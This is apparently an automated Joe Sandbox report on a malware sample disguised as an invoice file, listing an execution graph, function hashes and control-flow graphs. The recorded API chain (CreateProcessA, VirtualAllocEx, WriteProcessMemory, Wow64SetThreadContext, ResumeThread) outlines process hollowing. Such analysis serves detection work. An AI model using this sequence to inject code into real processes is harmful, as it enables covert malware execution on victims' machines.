                                                                                                                              execution_graph 33907 54e658e 33908 54e65a2 33907->33908 33910 54e65a9 33907->33910 33909 54e65fa CallWindowProcW 33908->33909 33908->33910 33909->33910 33911 2e94668 33912 2e94672 33911->33912 33914 2e94758 33911->33914 33915 2e9475d 33914->33915 33919 2e94868 33915->33919 33923 2e94858 33915->33923 33921 2e9488f 33919->33921 33920 2e9496c 33920->33920 33921->33920 33927 2e9449c 33921->33927 33925 2e94868 33923->33925 33924 2e9496c 33924->33924 33925->33924 33926 2e9449c CreateActCtxA 33925->33926 33926->33924 33928 2e958f8 CreateActCtxA 33927->33928 33930 2e959af 33928->33930 33931 72b3168 33932 72b3170 33931->33932 33933 72b31e8 33932->33933 33937 72b3584 33932->33937 33946 72b3540 33932->33946 33955 72b3530 33932->33955 33938 72b3559 33937->33938 33939 72b365b 33938->33939 33964 72b399b 33938->33964 33986 72b3975 33938->33986 34000 72b3926 33938->34000 34016 72b3d41 33938->34016 34026 72b3ae1 33938->34026 34040 72b3988 33938->34040 33939->33933 33947 72b3559 33946->33947 33948 72b365b 33947->33948 33949 72b399b 11 API calls 33947->33949 33950 72b3988 11 API calls 33947->33950 33951 72b3ae1 9 API calls 33947->33951 33952 72b3d41 6 API calls 33947->33952 33953 72b3926 11 API calls 33947->33953 33954 72b3975 9 API calls 33947->33954 33948->33933 33949->33948 33950->33948 33951->33948 33952->33948 33953->33948 33954->33948 33956 72b3559 33955->33956 33957 72b365b 33956->33957 33958 72b399b 11 API calls 33956->33958 33959 72b3988 11 API calls 33956->33959 33960 72b3ae1 9 API calls 33956->33960 33961 72b3d41 6 API calls 33956->33961 33962 72b3926 11 API calls 33956->33962 33963 72b3975 9 API calls 33956->33963 33957->33933 33958->33957 33959->33957 33960->33957 33961->33957 33962->33957 33963->33957 33965 72b39c5 33964->33965 34063 72b2b58 33964->34063 34067 72b2b50 33964->34067 33967 72b3a9c 33965->33967 34071 72b2758 33965->34071 34075 72b2760 33965->34075 33966 72b3a19 33966->33967 33969 72b3915 33966->33969 33970 72b3978 33966->33970 34101 72b26a8 33966->34101 34105 72b26b0 33966->34105 33968 72b3c73 33967->33968 33981 72b2758 Wow64SetThreadContext 33967->33981 33982 72b2760 Wow64SetThreadContext 33967->33982 34079 72b2c41 33967->34079 34083 72b2c48 33967->34083 33969->33939 33970->33967 33970->33969 33977 72b2b58 WriteProcessMemory 33970->33977 33978 72b2b50 WriteProcessMemory 33970->33978 34087 72b2a90 33970->34087 34091 72b2838 33970->34091 34096 72b2828 33970->34096 33977->33970 33978->33970 33981->33967 33982->33967 33987 72b3978 33986->33987 33988 72b3a9c 33987->33988 33989 72b3915 33987->33989 33995 72b2828 VirtualAllocEx 33987->33995 33996 72b2838 VirtualAllocEx 33987->33996 33997 72b2a90 VirtualAllocEx 33987->33997 33998 72b2b58 WriteProcessMemory 33987->33998 33999 72b2b50 WriteProcessMemory 33987->33999 33990 72b3c73 33988->33990 33991 72b2758 Wow64SetThreadContext 33988->33991 33992 72b2760 Wow64SetThreadContext 33988->33992 33993 72b2c48 ReadProcessMemory 33988->33993 33994 72b2c41 ReadProcessMemory 33988->33994 33989->33939 33991->33988 33992->33988 33993->33988 33994->33988 33995->33987 33996->33987 33997->33987 33998->33987 33999->33987 34109 72b2de0 34000->34109 34113 72b2dd4 34000->34113 34017 72b3d5f 34016->34017 34022 72b2b58 WriteProcessMemory 34017->34022 34023 72b2b50 WriteProcessMemory 34017->34023 34018 72b3c73 34019 72b3a9c 34019->34018 34020 72b2758 Wow64SetThreadContext 34019->34020 34021 72b2760 Wow64SetThreadContext 34019->34021 34024 72b2c48 ReadProcessMemory 34019->34024 34025 72b2c41 ReadProcessMemory 34019->34025 34020->34019 34021->34019 34022->34019 34023->34019 34024->34019 34025->34019 34027 72b3978 34026->34027 34027->34026 34028 72b3915 34027->34028 34029 72b3a9c 34027->34029 34031 72b2828 VirtualAllocEx 34027->34031 34032 72b2838 VirtualAllocEx 34027->34032 34033 72b2a90 VirtualAllocEx 34027->34033 34038 72b2b58 WriteProcessMemory 34027->34038 34039 72b2b50 WriteProcessMemory 34027->34039 34028->33939 34030 72b3c73 34029->34030 34034 72b2758 Wow64SetThreadContext 34029->34034 34035 72b2760 Wow64SetThreadContext 34029->34035 34036 72b2c48 ReadProcessMemory 34029->34036 34037 72b2c41 ReadProcessMemory 34029->34037 34031->34027 34032->34027 34033->34027 34034->34029 34035->34029 34036->34029 34037->34029 34038->34027 34039->34027 34041 72b3990 34040->34041 34050 72b2b58 WriteProcessMemory 34041->34050 34051 72b2b50 WriteProcessMemory 34041->34051 34042 72b39c5 34044 72b3a9c 34042->34044 34052 72b2758 Wow64SetThreadContext 34042->34052 34053 72b2760 Wow64SetThreadContext 34042->34053 34043 72b3a19 34043->34044 34046 72b3915 34043->34046 34047 72b3978 34043->34047 34048 72b26a8 ResumeThread 34043->34048 34049 72b26b0 ResumeThread 34043->34049 34045 72b3c73 34044->34045 34054 72b2c48 ReadProcessMemory 34044->34054 34055 72b2c41 ReadProcessMemory 34044->34055 34058 72b2758 Wow64SetThreadContext 34044->34058 34059 72b2760 Wow64SetThreadContext 34044->34059 34046->33939 34047->34044 34047->34046 34056 72b2b58 WriteProcessMemory 34047->34056 34057 72b2b50 WriteProcessMemory 34047->34057 34060 72b2828 VirtualAllocEx 34047->34060 34061 72b2838 VirtualAllocEx 34047->34061 34062 72b2a90 VirtualAllocEx 34047->34062 34048->34043 34049->34043 34050->34042 34051->34042 34052->34043 34053->34043 34054->34044 34055->34044 34056->34047 34057->34047 34058->34044 34059->34044 34060->34047 34061->34047 34062->34047 34064 72b2ba0 WriteProcessMemory 34063->34064 34066 72b2bf7 34064->34066 34066->33965 34068 72b2ba0 WriteProcessMemory 34067->34068 34070 72b2bf7 34068->34070 34070->33965 34072 72b27a5 Wow64SetThreadContext 34071->34072 34074 72b27ed 34072->34074 34074->33966 34076 72b27a5 Wow64SetThreadContext 34075->34076 34078 72b27ed 34076->34078 34078->33966 34080 72b2c93 ReadProcessMemory 34079->34080 34082 72b2cd7 34080->34082 34082->33967 34084 72b2c93 ReadProcessMemory 34083->34084 34086 72b2cd7 34084->34086 34086->33967 34088 72b2ad8 VirtualAllocEx 34087->34088 34090 72b2b15 34088->34090 34090->33970 34092 72b286d 34091->34092 34093 72b2ae2 VirtualAllocEx 34092->34093 34095 72b28c0 34092->34095 34094 72b2b15 34093->34094 34094->33970 34095->33970 34097 72b286d 34096->34097 34098 72b2ae2 VirtualAllocEx 34097->34098 34100 72b28c0 34097->34100 34099 72b2b15 34098->34099 34099->33970 34100->33970 34102 72b26b0 ResumeThread 34101->34102 34104 72b2721 34102->34104 34104->33966 34106 72b26f0 ResumeThread 34105->34106 34108 72b2721 34106->34108 34108->33966 34110 72b2e69 34109->34110 34110->34110 34111 72b2fce CreateProcessA 34110->34111 34112 72b302b 34111->34112 34114 72b2e69 34113->34114 34114->34114 34115 72b2fce CreateProcessA 34114->34115 34116 72b302b 34115->34116 34116->34116 34117 54e2088 34119 54e21b9 34117->34119 34120 54e20b9 34117->34120 34118 54e20c5 34120->34118 34123 54e2ecf 34120->34123 34128 54e2ee0 34120->34128 34124 54e2ee0 34123->34124 34125 54e2fba 34124->34125 34133 54e3db2 34124->34133 34137 54e3dc0 34124->34137 34129 54e2f0b 34128->34129 34130 54e2fba 34129->34130 34131 54e3db2 CreateWindowExW 34129->34131 34132 54e3dc0 CreateWindowExW 34129->34132 34131->34130 34132->34130 34134 54e3dc0 34133->34134 34140 54e1998 34134->34140 34138 54e1998 CreateWindowExW 34137->34138 34139 54e3df5 34138->34139 34139->34125 34141 54e3e10 CreateWindowExW 34140->34141 34143 54e3f34 34141->34143 34144 2e9f5e0 34145 2e9f626 34144->34145 34146 2e9f713 34145->34146 34149 2e9fbc8 34145->34149 34152 2e9fbb8 34145->34152 34155 2e9f81c 34149->34155 34153 2e9fbf6 34152->34153 34154 2e9f81c DuplicateHandle 34152->34154 34153->34146 34154->34153 34156 2e9fc30 DuplicateHandle 34155->34156 34157 2e9fbf6 34156->34157 34157->34146 34165 2e9d250 34166 2e9d25f 34165->34166 34169 2e9d349 34165->34169 34177 2e9d338 34165->34177 34170 2e9d359 34169->34170 34171 2e9d37c 34169->34171 34170->34171 34185 2e9d5d0 34170->34185 34189 2e9d5e0 34170->34189 34171->34166 34172 2e9d374 34172->34171 34173 2e9d580 GetModuleHandleW 34172->34173 34174 2e9d5ad 34173->34174 34174->34166 34178 2e9d34a 34177->34178 34179 2e9d37c 34178->34179 34183 2e9d5e0 LoadLibraryExW 34178->34183 34184 2e9d5d0 LoadLibraryExW 34178->34184 34179->34166 34180 2e9d374 34180->34179 34181 2e9d580 GetModuleHandleW 34180->34181 34182 2e9d5ad 34181->34182 34182->34166 34183->34180 34184->34180 34186 2e9d5f4 34185->34186 34188 2e9d619 34186->34188 34193 2e9c6d0 34186->34193 34188->34172 34190 2e9d5f4 34189->34190 34191 2e9d619 34190->34191 34192 2e9c6d0 LoadLibraryExW 34190->34192 34191->34172 34192->34191 34194 2e9d7c0 LoadLibraryExW 34193->34194 34196 2e9d839 34194->34196 34196->34188 34158 72b42e0 34159 72b446b 34158->34159 34160 72b4306 34158->34160 34160->34159 34162 72b3ecc 34160->34162 34163 72b4560 PostMessageW 34162->34163 34164 72b45cc 34163->34164 34164->34160 34197 72b5310 34198 72b532e 34197->34198 34199 72b5338 34197->34199 34202 72b5378 34198->34202 34207 72b5363 34198->34207 34203 72b5386 34202->34203 34206 72b53a5 34202->34206 34212 72b4cb4 34203->34212 34206->34199 34208 72b5378 34207->34208 34209 72b53a5 34208->34209 34210 72b4cb4 FindCloseChangeNotification 34208->34210 34209->34199 34211 72b53a1 34210->34211 34211->34199 34213 72b54f0 FindCloseChangeNotification 34212->34213 34214 72b53a1 34213->34214 34214->34199 34215 72b42d0 34216 72b4287 34215->34216 34219 72b42da 34215->34219 34217 72b446b 34218 72b3ecc PostMessageW 34218->34219 34219->34217 34219->34218

                                                                                                                              Executed Functions

                                                                                                                              Function 054E90F0 Relevance: 9.3, Strings: 7, Instructions: 545COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1265525054.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_54e0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: :$:$E$O$P$S$t
                                                                                                                              • API String ID: 0-3177760418
                                                                                                                              • Opcode ID: 73a7a137229deff3b7d619533c09723f5a0874e6174381c128a55fb3920aa0da
                                                                                                                              • Instruction ID: 20bdc4badfc7f4377e9aa78c7a43f78fb4a72ce5b09c3c9e7a833bb202024369
                                                                                                                              • Opcode Fuzzy Hash: 73a7a137229deff3b7d619533c09723f5a0874e6174381c128a55fb3920aa0da
                                                                                                                              • Instruction Fuzzy Hash: 87322770A10A04CFDB15EB75C8587DEB7B2AFCA305F1045AED00AAB360DB75A989CF51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 054E9100 Relevance: 9.3, Strings: 7, Instructions: 538COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1265525054.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_54e0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: :$:$E$O$P$S$t
                                                                                                                              • API String ID: 0-3177760418
                                                                                                                              • Opcode ID: e9fd79874dcfeb97321ae1ae44792b26407d1bd719d846fd91dc8ad3c2239741
                                                                                                                              • Instruction ID: 952a3db6476678408b1732dd871b88a86a6b1909f25718e4956bf90753bbfe44
                                                                                                                              • Opcode Fuzzy Hash: e9fd79874dcfeb97321ae1ae44792b26407d1bd719d846fd91dc8ad3c2239741
                                                                                                                              • Instruction Fuzzy Hash: 63322770A10A04CFDB15EF75C85879DB7B2AFCA305F1045AED00AAB360DB75A989CF51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02E98708 Relevance: 1.4, Strings: 1, Instructions: 173COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262831946.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2e90000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 0-3916222277
                                                                                                                              • Opcode ID: 9c548c1360f537248f014f52477a0561fef5a0001be5867e6fe242d4f76f9796
                                                                                                                              • Instruction ID: 155c90c7bce162c12552d89b05cadddef709e52fa6bea3ea827307bb2294442c
                                                                                                                              • Opcode Fuzzy Hash: 9c548c1360f537248f014f52477a0561fef5a0001be5867e6fe242d4f76f9796
                                                                                                                              • Instruction Fuzzy Hash: 8A51ED71F001158FCB18CB69D8806AEB7B2FBC9315B64C57AE519D7758DB30EC418B91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02E97302 Relevance: .9, Instructions: 887COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262831946.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2e90000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d3c7484a94ad216f67aeb9fd8d3f8e5b025a2c993874d142f88304f45e603899
                                                                                                                              • Instruction ID: 72d580745cb8289d15ce599863e919d52ddb99ae186e0fa971b0a63a28b0a86e
                                                                                                                              • Opcode Fuzzy Hash: d3c7484a94ad216f67aeb9fd8d3f8e5b025a2c993874d142f88304f45e603899
                                                                                                                              • Instruction Fuzzy Hash: 73729DB4E502298FCB14CF69D884AADBBF2FF88305F15C66AE405EB355D730A945CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02E983E0 Relevance: .2, Instructions: 235COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262831946.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2e90000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 158592a744480b62171fb24de14ccf406717350e3bad01edadfd3fc92d42b6f6
                                                                                                                              • Instruction ID: ae16b088106ea9f5510a08ef5b7ca85492716a1516c13f99ed578d3b03a34f29
                                                                                                                              • Opcode Fuzzy Hash: 158592a744480b62171fb24de14ccf406717350e3bad01edadfd3fc92d42b6f6
                                                                                                                              • Instruction Fuzzy Hash: 8B816C32B505249FDB14DB69C880B5EB7A3AFC9710F1AC1A5E419EB366DE74EC018B80
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02E96FE0 Relevance: .2, Instructions: 206COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262831946.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2e90000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 71719681a663b9b8580e73acf3062f2e835831c3d7508668a0fc0356629b1eb7
                                                                                                                              • Instruction ID: e66a175421112b89784682ab852f8536c9e05e9603d386647ef13e8ad684d238
                                                                                                                              • Opcode Fuzzy Hash: 71719681a663b9b8580e73acf3062f2e835831c3d7508668a0fc0356629b1eb7
                                                                                                                              • Instruction Fuzzy Hash: BD711AB8D5010EDFDF14CFAAD484AADBBB1BF88314F10A655D412EB254DB319941CF60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02E98481 Relevance: .2, Instructions: 188COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262831946.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2e90000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0024e498834659658a0f28c7a30b08e86ecca9a6d2a2870d166f5ac7c39d195a
                                                                                                                              • Instruction ID: b2709308d3345ed2872cb8e364669f53a326b80e6a26602b268b3ed4a3d4b386
                                                                                                                              • Opcode Fuzzy Hash: 0024e498834659658a0f28c7a30b08e86ecca9a6d2a2870d166f5ac7c39d195a
                                                                                                                              • Instruction Fuzzy Hash: BD613C32F505248FD754DB69C880B5EB7A3AFC8710F1AC165E419EB36ADE74EC018B90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 072B2DD4 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 244processCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 308 72b2dd4-72b2e75 310 72b2eae-72b2ece 308->310 311 72b2e77-72b2e81 308->311 318 72b2ed0-72b2eda 310->318 319 72b2f07-72b2f36 310->319 311->310 312 72b2e83-72b2e85 311->312 313 72b2ea8-72b2eab 312->313 314 72b2e87-72b2e91 312->314 313->310 316 72b2e93 314->316 317 72b2e95-72b2ea4 314->317 316->317 317->317 320 72b2ea6 317->320 318->319 321 72b2edc-72b2ede 318->321 327 72b2f38-72b2f42 319->327 328 72b2f6f-72b3029 CreateProcessA 319->328 320->313 322 72b2f01-72b2f04 321->322 323 72b2ee0-72b2eea 321->323 322->319 325 72b2eee-72b2efd 323->325 326 72b2eec 323->326 325->325 329 72b2eff 325->329 326->325 327->328 330 72b2f44-72b2f46 327->330 339 72b302b-72b3031 328->339 340 72b3032-72b30b8 328->340 329->322 332 72b2f69-72b2f6c 330->332 333 72b2f48-72b2f52 330->333 332->328 334 72b2f56-72b2f65 333->334 335 72b2f54 333->335 334->334 337 72b2f67 334->337 335->334 337->332 339->340 350 72b30ba-72b30be 340->350 351 72b30c8-72b30cc 340->351 350->351 352 72b30c0 350->352 353 72b30ce-72b30d2 351->353 354 72b30dc-72b30e0 351->354 352->351 353->354 357 72b30d4 353->357 355 72b30e2-72b30e6 354->355 356 72b30f0-72b30f4 354->356 355->356 358 72b30e8 355->358 359 72b3106-72b310d 356->359 360 72b30f6-72b30fc 356->360 357->354 358->356 361 72b310f-72b311e 359->361 362 72b3124 359->362 360->359 361->362 364 72b3125 362->364 364->364
                                                                                                                              APIs
                                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 072B3016
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateProcess
                                                                                                                              • String ID: 7KD;$7KD;
                                                                                                                              • API String ID: 963392458-104565202
                                                                                                                              • Opcode ID: f4b4f6666f41038c75a01caba62ccd5fd6d98a14ad11175ab96075d1f3cdaf3b
                                                                                                                              • Instruction ID: ca31c7b49631229aa9caf20c3fa9a3fb3ac6c1623a36d5b5818ccd8c74fa7fa2
                                                                                                                              • Opcode Fuzzy Hash: f4b4f6666f41038c75a01caba62ccd5fd6d98a14ad11175ab96075d1f3cdaf3b
                                                                                                                              • Instruction Fuzzy Hash: 1D9147B1D1075ADFEB24CFA8C840BEDBAB2FF49310F148569E808A7240DB749985CF91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 072B2DE0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243processCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 365 72b2de0-72b2e75 367 72b2eae-72b2ece 365->367 368 72b2e77-72b2e81 365->368 375 72b2ed0-72b2eda 367->375 376 72b2f07-72b2f36 367->376 368->367 369 72b2e83-72b2e85 368->369 370 72b2ea8-72b2eab 369->370 371 72b2e87-72b2e91 369->371 370->367 373 72b2e93 371->373 374 72b2e95-72b2ea4 371->374 373->374 374->374 377 72b2ea6 374->377 375->376 378 72b2edc-72b2ede 375->378 384 72b2f38-72b2f42 376->384 385 72b2f6f-72b3029 CreateProcessA 376->385 377->370 379 72b2f01-72b2f04 378->379 380 72b2ee0-72b2eea 378->380 379->376 382 72b2eee-72b2efd 380->382 383 72b2eec 380->383 382->382 386 72b2eff 382->386 383->382 384->385 387 72b2f44-72b2f46 384->387 396 72b302b-72b3031 385->396 397 72b3032-72b30b8 385->397 386->379 389 72b2f69-72b2f6c 387->389 390 72b2f48-72b2f52 387->390 389->385 391 72b2f56-72b2f65 390->391 392 72b2f54 390->392 391->391 394 72b2f67 391->394 392->391 394->389 396->397 407 72b30ba-72b30be 397->407 408 72b30c8-72b30cc 397->408 407->408 409 72b30c0 407->409 410 72b30ce-72b30d2 408->410 411 72b30dc-72b30e0 408->411 409->408 410->411 414 72b30d4 410->414 412 72b30e2-72b30e6 411->412 413 72b30f0-72b30f4 411->413 412->413 415 72b30e8 412->415 416 72b3106-72b310d 413->416 417 72b30f6-72b30fc 413->417 414->411 415->413 418 72b310f-72b311e 416->418 419 72b3124 416->419 417->416 418->419 421 72b3125 419->421 421->421
                                                                                                                              APIs
                                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 072B3016
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateProcess
                                                                                                                              • String ID: 7KD;$7KD;
                                                                                                                              • API String ID: 963392458-104565202
                                                                                                                              • Opcode ID: c983de32d482566625e1deddd22863a0b31e1a103b474813359480258a801595
                                                                                                                              • Instruction ID: fa6a3071c1c7351a412fcb7d0335ddfef62eb9f48f3d84a86d121b4fb8165752
                                                                                                                              • Opcode Fuzzy Hash: c983de32d482566625e1deddd22863a0b31e1a103b474813359480258a801595
                                                                                                                              • Instruction Fuzzy Hash: 079138B1D1075ADFEB24CFA9C840BEDBAF2FF48310F148569E808A6240DB749985CF91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 054E3E04 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 437 54e3e04-54e3e76 438 54e3e78-54e3e7e 437->438 439 54e3e81-54e3e88 437->439 438->439 440 54e3e8a-54e3e90 439->440 441 54e3e93-54e3ecb 439->441 440->441 442 54e3ed3-54e3f32 CreateWindowExW 441->442 443 54e3f3b-54e3f73 442->443 444 54e3f34-54e3f3a 442->444 448 54e3f75-54e3f78 443->448 449 54e3f80 443->449 444->443 448->449 450 54e3f81 449->450 450->450
                                                                                                                              APIs
                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 054E3F22
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1265525054.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_54e0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateWindow
                                                                                                                              • String ID: 7KD;$7KD;
                                                                                                                              • API String ID: 716092398-104565202
                                                                                                                              • Opcode ID: 3673eb97ab8c830db17bd0086adfcf14fd6055558d56d56dc33985caeafc6313
                                                                                                                              • Instruction ID: 30b9dcdf7b69a57ea32429fafaaa90780c16ae97d1cbd9e44af7af361c348b66
                                                                                                                              • Opcode Fuzzy Hash: 3673eb97ab8c830db17bd0086adfcf14fd6055558d56d56dc33985caeafc6313
                                                                                                                              • Instruction Fuzzy Hash: AD51C2B1D00349DFDB15CF99D884ADEBBB6FF48310F64852AE819AB214D774A845CF90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 054E1998 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 422 54e1998-54e3e76 424 54e3e78-54e3e7e 422->424 425 54e3e81-54e3e88 422->425 424->425 426 54e3e8a-54e3e90 425->426 427 54e3e93-54e3f32 CreateWindowExW 425->427 426->427 429 54e3f3b-54e3f73 427->429 430 54e3f34-54e3f3a 427->430 434 54e3f75-54e3f78 429->434 435 54e3f80 429->435 430->429 434->435 436 54e3f81 435->436 436->436
                                                                                                                              APIs
                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 054E3F22
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1265525054.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_54e0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateWindow
                                                                                                                              • String ID: 7KD;$7KD;
                                                                                                                              • API String ID: 716092398-104565202
                                                                                                                              • Opcode ID: 04de7351681545bb59272c6db7982c9db8f26b1e03f0ac4624076d310a9ebfc3
                                                                                                                              • Instruction ID: c2cbb892ceae7424fe5594bf4b0f5528a216aa63f1edcdf5f351604b08487c32
                                                                                                                              • Opcode Fuzzy Hash: 04de7351681545bb59272c6db7982c9db8f26b1e03f0ac4624076d310a9ebfc3
                                                                                                                              • Instruction Fuzzy Hash: 0751A0B1D003499FDB15CF9AD884ADEBBB6BF48310F64852AE819AB214D771A845CF90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 072B2838 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 252memoryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 491 72b2838-72b2867 492 72b290e-72b2910 491->492 493 72b286d-72b2883 491->493 496 72b295c-72b295f 492->496 497 72b2912-72b291a 492->497 494 72b2889-72b2891 493->494 495 72b2a7d-72b2b13 VirtualAllocEx 493->495 494->495 500 72b2897-72b28a7 494->500 518 72b2b1c-72b2b41 495->518 519 72b2b15-72b2b1b 495->519 498 72b2a75-72b2a7c 496->498 499 72b2965-72b297b 496->499 501 72b2928-72b294e 497->501 502 72b291c-72b291e 497->502 499->495 503 72b2981-72b2989 499->503 500->495 504 72b28ad-72b28ba 500->504 501->495 517 72b2954-72b2957 501->517 502->501 503->495 506 72b298f-72b299c 503->506 504->495 507 72b28c0-72b28d7 504->507 506->495 510 72b29a2-72b29b2 506->510 511 72b28d9-72b28dc 507->511 512 72b28de 507->512 510->495 515 72b29b8-72b29d5 510->515 514 72b28e0-72b2909 511->514 512->514 514->498 515->495 520 72b29db-72b29e3 515->520 517->498 519->518 520->495 521 72b29e9-72b29f9 520->521 521->495 525 72b29ff-72b2a0c 521->525 525->495 527 72b2a0e-72b2a25 525->527 529 72b2a2a-72b2a68 527->529 530 72b2a27 527->530 537 72b2a6a 529->537 538 72b2a6d 529->538 530->529 537->538 538->498
                                                                                                                              APIs
                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 072B2B06
                                                                                                                              Strings
